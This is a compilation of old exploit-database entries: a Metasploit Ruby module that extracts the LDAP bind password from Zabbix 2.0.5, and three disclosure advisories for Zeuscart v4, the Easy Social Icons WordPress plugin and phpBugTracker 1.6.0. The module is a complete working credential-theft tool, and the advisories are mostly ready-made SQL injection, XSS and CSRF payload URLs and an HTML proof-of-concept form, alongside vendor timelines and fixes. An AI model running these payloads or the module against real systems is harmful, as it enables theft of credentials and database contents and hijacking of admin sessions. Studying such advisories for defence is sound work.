## # This module requires Metasploit # Date: 25-09-2013 # Author: Pablo González # Vendor Homepage: Zabbix -> http://www.zabbix.com # Software Link: http://www.zabbix.com # Version: 2.0.5 # Tested On: Linux (Ubuntu, Suse, CentOS) # CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572 # More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572 # http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html # http://seclists.org/fulldisclosure/2013/Sep/151 # http://www.cvedetails.com/cve/CVE-2013-5572/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ldap_bind_password Zabbix CVE-2013-5572', 'Description' => %q{ Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code. }, 'License' => MSF_LICENSE, 'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ] )) register_options([ OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']), OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']), OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5]) ], self.class) end def run req end def req resp = send_request_cgi( { 'host' => datastore['RHOST'], 'method' => 'POST', 'uri' => normalize_uri(target_uri.path.to_s), 'cookie' => "zbx_sessionid=#{datastore['zbx_session']}", 'content-type' => 'application/x-www-form-urlencoded' }, datastore['TIMEOUT']) ldap_host(resp) user_passDomain(resp) user_zabbix(resp) end def ldap_host(response) cut = response.body.split("ldap_host\" value=\"")[1] if cut != nil host = cut.split("\"")[0] print_good "LDAP Host => #{host}" end end def user_passDomain(response) cut = response.body.split("ldap_bind_dn\" value=\"")[1] if cut != nil user = cut.split("\"")[0] print_good "User Domain? => #{user}" end cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1] if cut != nil pass = cut.split("\"")[0] print_good "Password Domain? => #{pass}" end end def user_zabbix(response) cut = response.body.split("user\" value=\"")[1] if cut != nil user = cut.split("\"")[0] print_good "User Zabbix => #{user}" end end end Source

Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4 Advisory ID: SROEADV-2015-12 Author: Steffen Rösemann Affected Software: Zeuscart v.4 Vendor URL: http://zeuscart.com/ Vendor Status: pending CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Software used for research: Mac OS X 10.10, Firefox 35.0.1 ========================== Vulnerability Description: ========================== ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities. ================== Technical Details: ================== ==== XSS === Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited for example by crafting a link and make a registered user click on that link. The parameter "search", which is used in the index.php is vulnerable to XSS-attacks. Exploit-Example: http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr" which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter: Exploit-Example: http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php. Exploit-Example: http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E ==== SQLi ==== The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation. By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability: Exploit-Example: http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+ Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter: Exploit-Example: http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+ The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter: http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+ ============== Information Disclosure ============== The administrative backend of Zeuscart v. 4 allows the admin to use a functionality, which displays the PHP-installation settings via phpinfo(): http://{TARGET}/admin/?do=getphpinfo Unfortunately, the PHP-script does not check, if an authorized admin executes this functionality: It is possible even for unregistered users to request the above link to see the informations, phpinfo() displays. That could expose sensitive informations to an attacker which could lead to further exploitation. ========= Solution: ========= Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together. Currently, there is no patch available to secure Zeuscart-installations. ==================== Disclosure Timeline: ==================== 21-Jan-2015 – found the vulnerabilities 21-Jan-2015 - informed the developers (see [3]) 21-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5]) 22-Jan-2015 - vendor responded, provided detailed information 04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3]) 19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond 21-Feb-2015 - release date of this security advisory 21-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://zeuscart.com/ [2] https://github.com/ZeusCart/zeuscart [3] https://github.com/ZeusCart/zeuscart/issues/28 [4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html [5] https://github.com/sroesemann/zeuscart Source

==================================================== Product: Easy Social Icons WordPress plugin Vendor: CyberNetikz Tested Version: 1.2.2 Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352] Risk Level: Medium Solution Status: Solved in version 1.2.3 Discovered and Provided: Eric Flokstra - ITsec Security Services ==================================================== [-] About the Vendor: Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook. [-] Advisory Details: It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page. [-] Proof of Concept: <html> <body> <form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" <http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1> method="POST" enctype="multipart/form-data"> <input type="hidden" name="title" value="Example" /> <input type="hidden" name="image_file" value="http://10.0.2.215/wordpress/wp-content/uploads/2015/02/cookie.jpg"><script>alert(1)</script>" /> <input type="hidden" name="url" value="http://www.example.org" /> <input type="hidden" name="sortorder" value="0" /> <input type="hidden" name="target" value="1" /> <input type="hidden" name="action" value="edit" /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="submit_button" value="Save Changes" /> <input type="submit" value="Submit request" /> </form> </body> </html> [-] Disclosure Timeline: [02 Feb 2015]: Vendor notification [02 Feb 2015]: Vulnerability confirmation [11 Feb 2015]: Vulnerability patched [19 Feb 2015]: Public disclosure [-] Solution: Update to the latest version of Easy Social Icons. [-] References: [1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/ [2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org [3] ITsec Security Services BV -- http://www.itsec.nl ------------------------------------------------------------------------ ITsec Security Services bv. (KvK. 34181927) Postal Address: P.O. Box 5120, 2000GC Haarlem Visitors Address: Kenaupark 23, 2011 MR Haarlem Phone: +31 - (0)23 542 05 78 The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying,distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within.Use them at your own risk. Source

Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in phpBugTracker v.1.6.0 Advisory ID: SROEADV-2015-16 Author: Steffen Rösemann Affected Software: phpBugTracker v.1.6.0 Vendor URL: https://github.com/a-v-k/phpBugTracker Vendor Status: patched CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31 ========================== Vulnerability Description: ========================== The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-, stored/reflected XSS- and CSRF-vulnerabilities. ================== Technical Details: ================== The following files used in a common phpBugTracker installation suffer from different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities: =========== project.php =========== SQL injection / underlaying CSRF vulnerability in project.php via id parameter: http:// {TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+ Stored XSS via input field "project name": http://{TARGET}/admin/project.php?op=add executed in: e.g. http://{TARGET}/admin/project.php, http:// {TARGET}/index.php ======== user.php ======== Reflecting XSS in user.php via use_js parameter: http:// {TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1 executed in: same page ========= group.php ========= Reflecting XSS in group.php via use_js parameter: http:// {TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1 executed in: same page (Blind) SQL Injection / underlaying CSRF vulnerability in group.php via group_id parameter (used in different operations): http:// {TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+ http:// {TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+ ========== status.php ========== SQL injection / underlaying CSRF vulnerability in status.php via status_id parameter: http:// {TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ Stored XSS via input field "Description": http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0 executed in: e.g. http://{TARGET}/admin/status.php CSRF vulnerability in status.php (delete statuses): <img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}" ============== resolution.php ============== SQL injection / underlaying CSRF vulnerability in resolution.php via resolution_id parameter: http:// {TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in resolution.php (delete resolutions): <img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}" ============ severity.php ============ SQL injection / underlaying CSRF vulnerability in severity.php via severity_id parameter: http:// {TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+ CSRF vulnerability in severity.php (delete severities): <img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}" Stored XSS in severity.php via input field "Description": http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0 executed in: e.g. http://{TARGET}/admin/severity.php ============ priority.php ============ SQL injection / underlaying CSRF vulnerability in priority.php via priority_id parameter: http:// {TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+ ====== os.php ====== SQL Injection / underlaying CSRF vulnerability in os.php via os_id parameter: http:// {TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+ CSRF vulnerability in os.php (delete operating systems): <img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" > Stored XSS vulnerability in os.php via input field "Regex": http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0 executed in: e.g. http://{TARGET}/admin/os.php? ============ database.php ============ SQL injection / underlaying CSRF vulnerability in database.php via database_id: http:// {TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+ CSRF vulnerability in database.php (delete databases): <img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}" Stored XSS vulnerability in database.php via input field "Name": http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0 ======== site.php ======== CSRF vulnerability in site.php (delete sites): <img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" > SQL injection / underlaying CSRF vulnerability in site.php via site_id parameter: http:// {TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+ ======= bug.php ======= This issue has already been assigned CVE-2004-1519, but seems to have not been corrected since the assignment: SQL injection / underlaying CSRF vulnerability in bug.php via project parameter: http:// {TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+ For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519. ========= Solution: ========= Update to version 1.7.0. ==================== Disclosure Timeline: ==================== 03/05-Feb-2015 – found the vulnerabilities 05-Feb-2015 - informed the developers (see [3]) 05-Feb-2015 – release date of this security advisory [without technical details] 05-Feb-2015 - forked the Github repository, to keep it available for other security researchers (see [4]) 05/06-Feb-2015 - vendor replied, will provide a patch for the vulnerabilities 09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical details will be released on 19th February 2015 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] https://github.com/a-v-k/phpBugTracker [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html [3] https://github.com/a-v-k/phpBugTracker/issues/4 [4] https://github.com/sroesemann/phpBugTracker Source